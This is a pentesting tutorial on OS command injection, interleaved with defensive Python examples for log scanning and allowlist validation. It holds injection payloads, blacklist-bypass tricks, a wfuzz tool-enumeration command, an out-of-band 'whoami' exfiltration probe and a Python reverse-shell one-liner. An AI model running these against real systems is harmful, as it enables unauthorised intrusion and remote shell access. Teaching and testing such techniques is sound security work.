Mastering the Mechanics of Command Injection: Unraveling the Web’s Silent Threat


Command injection is like telling someone to play a specific song on a jukebox, but instead of just picking a song, you sneakily add instructions to also give you all the money inside the jukebox. In the digital world, instead of songs, we’re dealing with computer commands, and malicious users can exploit vulnerabilities to make the system do things it’s not supposed to.

Whenever a web application we are analysing appears to execute system-level commands, command injection tests should be run against every input field that might reach the backend system directly.


Identification

  • Identify based on the parameter name in the requests [1]
?cmd={payload} 
?exec={payload} 
?command={payload} 
?execute={payload} 
?ping={payload} 
?query={payload} 
?jump={payload} 
?code={payload} 
?reg={payload} 
?do={payload} 
?func={payload} 
?arg={payload} 
?option={payload} 
?load={payload} 
?process={payload} 
?step={payload} 
?read={payload} 
?function={payload} 
?req={payload} 
?feature={payload} 
?exe={payload} 
?module={payload} 
?payload={payload} 
?run={payload} 
?print={payload}
  • Identify by sending time-based or reflected output-based payloads

Payload lists to brute-force with: <link>, <link>
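As an added, defender-side example (not part of the original post), the following Python snippet applies the two identification cues above to web-server access logs instead of to a target: it parses the query string of each request, notes the parameter names listed above, and looks in the values for shell metacharacters, $IFS-style expansions, the backslash keyword-split trick and the time-based or out-of-band probe keywords (sleep, ping, nslookup). The log lines are constructed for this example and the field layout assumes the Apache/nginx combined format; the parameter-name set is taken from the list above.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Parameter names the post lists as commonly wired to an OS command.
SUSPECT_PARAMS = {
    "cmd", "exec", "command", "execute", "ping", "query", "jump", "code",
    "reg", "do", "func", "arg", "option", "load", "process", "step", "read",
    "function", "req", "feature", "exe", "module", "payload", "run", "print",
}

# Shell metacharacters that have no place in an IP/host/file-name value.
# '$' covers $IFS, ${IFS} and $(...); '\\[a-z]' catches the c\at keyword-split trick.
META_RE = re.compile(r"[;&|`$<>\n]|\\[a-z]")
# Keywords used for time-based and out-of-band (DNS/ICMP) confirmation.
PROBE_RE = re.compile(r"\b(sleep|ping|nslookup|dig|curl|wget)\b", re.I)

# Request field of an Apache/nginx "combined" access-log line.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log (not real traffic): one benign ping, two injection attempts,
# one benign search, one attempt against a 'cmd' parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ping?ip=127.0.0.1 HTTP/1.1" 200 312
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /ping?ip=127.0.0.1;id HTTP/1.1" 200 498
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /ping?ip=127.0.0.1%24%7BIFS%7Dsleep%2010 HTTP/1.1" 200 312
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=hello%20world HTTP/1.1" 200 1024
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /run?cmd=c%5Cat%20/etc/passwd HTTP/1.1" 500 0
"""


def parse_query(query):
    """Split on '&' only: ';' is a shell separator here, not a parameter separator."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def analyze_line(line):
    """Return findings for one log line (empty list when nothing looks like injection)."""
    m = REQ_RE.search(line)
    if not m:
        return []
    findings = []
    for name, value in parse_query(urlsplit(m.group("target")).query):
        value = unquote_plus(value)  # second decode pass catches double-encoded payloads
        reasons = []
        if name.lower() in SUSPECT_PARAMS:
            reasons.append("suspect-param")
        if META_RE.search(value):
            reasons.append("shell-meta")
        if PROBE_RE.search(value):
            reasons.append("probe-keyword")
        # A suspect name alone (?ping=127.0.0.1) is normal traffic; require a
        # metacharacter or probe keyword, and keep the name as context.
        if "shell-meta" in reasons or "probe-keyword" in reasons:
            findings.append({"param": name, "value": value, "reasons": reasons})
    return findings


def scan_log(text):
    """Map 1-based line numbers of flagged requests to their findings."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        found = analyze_line(line)
        if found:
            hits[lineno] = found
    return hits


if __name__ == "__main__":
    for lineno, found in scan_log(SAMPLE_LOG).items():
        for f in found:
            print("line %d: %s=%r -> %s" % (lineno, f["param"], f["value"], ", ".join(f["reasons"])))
```

Running the script flags lines 2, 3 and 5 of the sample and leaves the benign ping and search requests alone. Two design points matter in practice: the query string is split on "&" only, because a ";" in a value is exactly what we want to see rather than a field boundary, and values are decoded twice so that double-encoded payloads do not slip past the regexes.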


Exploit (build payload)

  1. Check for existing tools using the payload below:
fuffsec #baseline 
wget 
curl 
fetch 
gcc 
cc 
nc 
socat 
ping 
netstat 
ss 
ifconfig 
ip 
hostname 
php 
python 
python3 
perl 
java 
awk 
sed 
grep 
cat 
more 
less 
tail 
head 
find 
ssh 
telnet 
bash 
sh 
zsh 
dig 
nslookup 
traceroute 
dd 
ncat 
nmap 
ftp 
tftp 
base64 
gzip 
gunzip 
tar 
zip 
unzip
wfuzz -c -z file,payload.txt --hc 404 "http:<end_point>?ip=127.0.0.1;which FUZZ"
  • Filter the results by response size (the nonexistent "fuffsec" entry at the top of the list serves as the baseline for what a "not found" response looks like)

2. Bypass restrictions

Types of restrictions are covered in 2.1 (blacklist) and 2.2 (blind) below. In general, first try encoding the payload; if that does not work, use the techniques listed under each type.
- base64
- hexadecimal
- octal
- double quotes and single quotes

2.1 blacklist bypass

2.1.1 Space bypass

<> 
< 
> 
$IFS\ 
${IFS}

2.1.2 keyword bypass

  • $* and $@

In the context of shell scripting, $* and $@ are used to refer to all the arguments passed to a script. If a script is mistakenly interpolating these within a command, an attacker can inject additional commands.

# A simplistic script 
echo "Printing argument: $@"
  • $x and ${x}

These are ways to reference positional parameters in a shell script. $x, where x is a number between 1 and 9, refers to the respective argument passed to the script; ${x}, where x is 10 or greater, is the form needed to refer to positional parameters beyond single digits.

  • Use backslashes

Backslashes can be used to escape characters, making the subsequent character be interpreted literally. This can sometimes be used to bypass filters.

Example: If a filter is blocking the cat command, an attacker might try c\at /etc/passwd to potentially bypass the filter.

  • Using variables

Variables can sometimes be set to particular values and then referenced to execute commands.
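The tool-enumeration request in step 1 (?ip=127.0.0.1;which FUZZ) and the space and keyword bypasses in 2.1 share one root cause: user input is spliced into a shell command string and then "protected" by a denylist. The following Python example is added here and is not from the original post. It models a hypothetical /ping?ip= handler in both shapes: the vulnerable string-concatenation version with a naive blacklist (its contents are an assumption), next to an allowlist validator whose output goes to subprocess.run as an argument vector with no shell at all. The evasive test values are the post's own $(whoami).collaborator_server_dot_com form and the ${IFS} and c\at forms from 2.1.

```python
import ipaddress
import re
import subprocess


# --- Vulnerable shape: the value is spliced into a shell command string ---
def build_ping_command_vulnerable(ip):
    """Return the string a naive handler would pass to os.system() or shell=True.
    It is returned, not executed, so the injected ';which wget' stays visible."""
    return "ping -c 1 " + ip


# --- Naive blacklist (assumed contents) of the kind section 2.1 defeats ---
BLACKLIST = [";", "&&", "||", "|", " ", "cat", "sleep"]


def blacklist_allows(value):
    """True when the denylist would let the value through; it cannot see $IFS or c\\at."""
    return not any(token in value for token in BLACKLIST)


# --- Allowlist: accept only an IP address or a plain DNS hostname ---
# Labels must start with an alphanumeric, so a leading '-' (option injection) is rejected too.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def validate_ping_target(value):
    """Return the value if it is a valid ping target, else raise ValueError."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError("invalid ping target: %r" % value)


def build_ping_command_safe(value):
    """Argument vector for subprocess.run(..., shell=False): no shell parses it, so
    ';', '|', $IFS and backslashes carry no meaning even if validation were bypassed."""
    return ["ping", "-c", "1", validate_ping_target(value)]


def ping(value, timeout=5):
    """Run the hardened command; stdout is returned for display, never interpreted."""
    result = subprocess.run(build_ping_command_safe(value), capture_output=True,
                            text=True, timeout=timeout)
    return result.returncode, result.stdout


if __name__ == "__main__":
    samples = ["127.0.0.1", "127.0.0.1;which wget",
               "$(whoami).collaborator_server_dot_com", "127.0.0.1${IFS}c\\at"]
    for s in samples:
        try:
            print("%-45s allowlist: OK      argv=%r" % (s, build_ping_command_safe(s)))
        except ValueError:
            print("%-45s allowlist: REJECT  blacklist_allows=%s" % (s, blacklist_allows(s)))
```

The blacklist stops the obvious "127.0.0.1;which wget" but lets both $IFS and backslash forms through, which is exactly the gap section 2.1 describes; the allowlist rejects every value that is not an IP address or hostname without needing to know any bypass trick. The second layer, passing a list to subprocess.run instead of a string to a shell, means that even a validation mistake does not hand the attacker a command interpreter.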

2.2 Blind injection bypass

Here there is no visible output, so we cannot tell whether the injection is happening. We therefore use the ‘sleep’ or ‘ping’ command to detect it (a measurable time delay or an out-of-band lookup).

ping $(whoami).collaborator_server_dot_com

blog: <link>, <link>

2.3 Misc

For more bypass techniques, follow this: <link>

3. Get a reverse shell

Given below are a few payloads we could use (encode them and bypass restrictions first):

Since we enumerated the existing tools in Step 1, we know what to do.

  • Python (example)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$IP",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Actual code:

import socket
import subprocess
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("IP", 9090))   # "IP" is a placeholder for the listener address
os.dup2(s.fileno(), 0)    # redirect stdin, stdout and stderr to the socket
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
I would suggest using this website to generate the payload: <link>

Exfiltrate

Source

You can use this resource to find some interesting payloads; make sure to encode them and bypass any restrictions. <link>


Tools:

  1. https://github.com/commixproject/commix

More Awesome Blogs

I am inspired by many bloggers and would like to list a few great people. Please give it a read if you can.

  1. https://medium.com/@Steiner254/os-command-injection-c4ee28fab521
  2. https://portswigger.net/web-security/os-command-injection
  3. https://www.cobalt.io/blog/introduction-to-command-injection-vulnerability
  4. https://www.cobalt.io/blog/a-pentesters-guide-to-command-injection
  5. https://infosecwriteups.com/breaking-down-command-injections-97d1029576

I have a small request to make. I often write articles on various security topics, so if you haven’t already, please follow me and give this article a clap. Your support motivates me to continue writing and sharing new insights with you all. Thank you!

If you do not follow me on here, here is my Twitter and LinkedIn.

☛ My-Twitter
My-Linkedin


References:

  1. https://twitter.com/trbughunters/status/1283133356922884096